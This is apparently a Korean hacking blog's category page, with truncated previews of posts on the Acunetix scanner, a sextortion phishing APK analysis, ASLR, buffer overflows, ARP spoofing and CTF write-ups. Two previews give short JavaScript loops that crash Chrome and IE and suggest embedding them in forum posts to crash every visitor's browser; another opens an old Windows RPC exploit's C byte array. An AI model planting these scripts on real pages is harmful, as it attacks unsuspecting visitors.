본문 바로가기

Hacking

[Tool] Acunetix Web Vulnerability Scanner 리포트 안녕하세요. Security M1S 입니다. 본 포스팅에서는 Acunetix Web Vulnerability Scanner 에 대하여 알아보도록 하겠습니다. 줄여서 Acunetix Scanner(아큐네틱스 스캐너) 라고 부르기도 합니다. 아큐네틱스는 웹 취약점 분석 스캐닝 툴로써, 특정 사이트에 취약점이 존재하는지 여부를 파악하고 점검할 수 있게 도와주는 툴입니다. 그러나 현실적으로는 많이 악용되고 있다는것도 사실입니다. 이른바 툴키디/스크립트 키디라고 불리는 계층의 해커를 꿈꾸는 꿈나무들이, 내부에 탑재되어있는 Blind SQL Injection 기능, 크롤링 기능 등그 위법 여부와 위험성을 자각하지 못하고 함부로 사용하여 법적인 처벌을 받는 경우도 종종 있는 것 으로 보여집니다. 실제로 Acuneti.. 더보기
스카이프 몸캠 피싱/스카이프 피싱 사기에 이용된 APK 파일 분석(2016.05.24) 안녕하세요. M1S 시큐어 입니다. 본 포스팅은 CSSIA(Cyber Security as a Service Influence Agency)의 지원을 받아 포스팅되었습니다. 몸캠협박, 스카이프 피싱사기(라인 몸캠피싱 포함) 에 이용되는 APK 파일 분석정보에 대하여 포스팅해드리고자 합니다. 대부분의 피해자분들께서 여쭤보시는게 "사기 당하면 갤러리나 공인인증서도 탈취되나요?" 입니다.이 궁금증을 풀어드리고자 상세하게 기재하여 드릴테니, 참고하시기 바랍니다. 우선적으로 이에 대한 정답은 "어플에 따라서 다르다" 입니다. 현재 갤러리를 탈취하는 어플리케이션은 SIMPLA ADMIN 이라는 서버를 사용하는 서버. 딱 한가지입니다. 탈취하는 정보는 모두 6가지(문자,연락처,통화기록,위치정보,갤러리,기기고유넘버)입.. 더보기
[Web Hacking] Chrome을 스크립트를 이용하여 강제 종료 시켜봅시다. 이번에는 IE가 아닌 많은 분들이 사용하는 Chrome 의 취약점을 이용하여 IE와 마찬가지로 강제종료 시켜 볼 예정입니다. IE는 바로 종료되지만 Chrome 은 5분~15분간의 딜레이를 두기 때문에 한번 강제종료되면 손 쓸 도리가 없습니다. 거기다가 IE에서 접속 할 시에는 Window 시스템이 에러가 나버리는 스크립트도 있으나 이건 공개하지 않겠습니다. 아래와 같은 구문을 콘솔에서 입력하면 크롬이 에러가 납니다. 마찬가지로 특정 게시물 접속시 아래와 같은 스크립트를 JS 또는 파일로 만들어서 자동 실행 되게 하면 크롬을 사용하는 모든 사용자들은 강제종료 됩니다. txt = "a"; while(1) { txt = txt += "a"; //add as much as the browser can hand.. 더보기
[Web Hacking]IE의 취약점을 이용하여 IE를 강제 종료시켜봅시다. 이번에 올릴 포스팅은 웹 해킹이라고 하기에는 뭐하나, 실용적으로 HTML 하나로 모든 접속자의 IE를 강제종료 시킬 수 있는 기법입니다. 아래와 같은 코드를 작성합니다. 또 다른 스크립트 문 입니다. for(x in document.write){document.write(x);} 그 후 메모장에서 .html 로 저장한 뒤 실행해보시면 IE가 강제종료되는 것을 보실 수 있을겁니다. 이 점을 악용하여 특정 게시판에 업로딩 후 게시물 클릭시 자동 실행되게 스크립트구문을 집어넣으면 접속하는 모든 접속자들의 IE가 강제종료됩니다.(또는 도메인을 개설 후 이동시키는 방법도 ?^-^) 더보기
[시스템 방어] Buffer Over Flow 에 대한 방어, ASLR 1. ASLR이란? ASLR (Address Space Layout Randomization) 은 프로그램을 실행했을 때 코드와 데이터가 항상 동일한 메모리 주소에 로드되는 것을 방지하기 위해Windows Vista 이상의 시스템에 적용된 보안 기법입니다. 프로그램이 실행되어 Windows 실행파일 (.exe) 이 메모리에 로딩될 때마다 기본 주소 (Image Base)의 값을랜덤하게 생성하여 프로세스가 메모리의 어느 부분에 로딩될지 알 수 없게 함으로써버퍼 오버플로우 취약점을 통한 공격을 차단하는 기술입니다. Windows XP 이하 시스템의 경우, 프로그램과 DLL (동적 링크 라이브러리, Dynamic Link Library) 의 메모리 주소가정해져 있었기 때문에 이를 통한 버퍼 오버플로우 공격에 .. 더보기
[시스템 해킹]버퍼 오버 플로우(Buffer Overflow) 1. 버퍼(Buffer)의 정의 및 버퍼 오버 플로우(Buffer Overflow) 의 정의 버퍼(Buffer) 란 메모리의 조각들, 다시 말해서 데이터를 저장하기 위해 휘발성으로 잠시동안 사용되는 한정적인 공간입니다. 흔하게 예를들어서 VB와 같은 프로그램으로 프로그래밍시에 버퍼의 크기를 검사하지 않고 프로그래밍할 경우 10KB 라는 할당 되어있는 저장공간이 있으면 이 메모리의 범위를 초과하는 버퍼가 입력되면 할당 된 버퍼 밖의 공간에 쓰기 가 발생하게 되는데 이 경우에 에러가 발생하게 됩니다. 이것을 버퍼 오버플로우 (Buffer Overflow) 라고 합니다. 2. 프로세스의 메모리 구조 버퍼 오버플로우를 이해하기 위해서는 먼저 프로그램의 실행 흐름과 스택(Stack) 의 구조에 대한 이해가 필요합.. 더보기
[Windows 취약점 익스플로잇] XP/2000 RPC Exploit (CVE-2003-0605) #include #include unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46, 0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,.. 더보기
[네트워크]ARP 스푸핑/ARP Spoofing http://www.youtube.com/watch?v=3seUWVK_Tb0&feature=player_embedded 동영상을 참고하시면서 보시기 바랍니다. - ARP스푸핑은 스위칭 환경의 랜상에서 패킷의 흐름을 바꾸는 공격기법 입니다.즉, 쉽게 말해서 '사기치는 공격' 이라고 할 수 있습니다. 스푸핑(Spoofing)의 뜻은 '속이다' 입니다. 스푸핑 공격은 시스템에 대한 권한얻기,암호화된 세션 복호화, 네트워크 트래픽의 흐름 변경등 여러분야에 걸쳐서 사용이 됩니다. ARP스푸핑은, MAC 주소를 속이는 것입니다. 그렇게 해서 통신흐름을 왜곡시키는 것이죠.위에 이미지 처럼 컴퓨터 A 에서 컴퓨터 B로 가기 위해서는 원래는 라우터를 경유해서 가는데ARP스푸핑을 통해서 해커의 PC를 경유해서 가게 만들 .. 더보기
webhacking.kr 2번 문제 풀이 본 PDF 파일의 저작권은 M1S Secur 에게 있지 않습니다. 더보기
webhacking.kr 6번 문제 풀이 본 PDF 파일의 저작권은 M1S Secur 에게 있지 않습니다. 더보기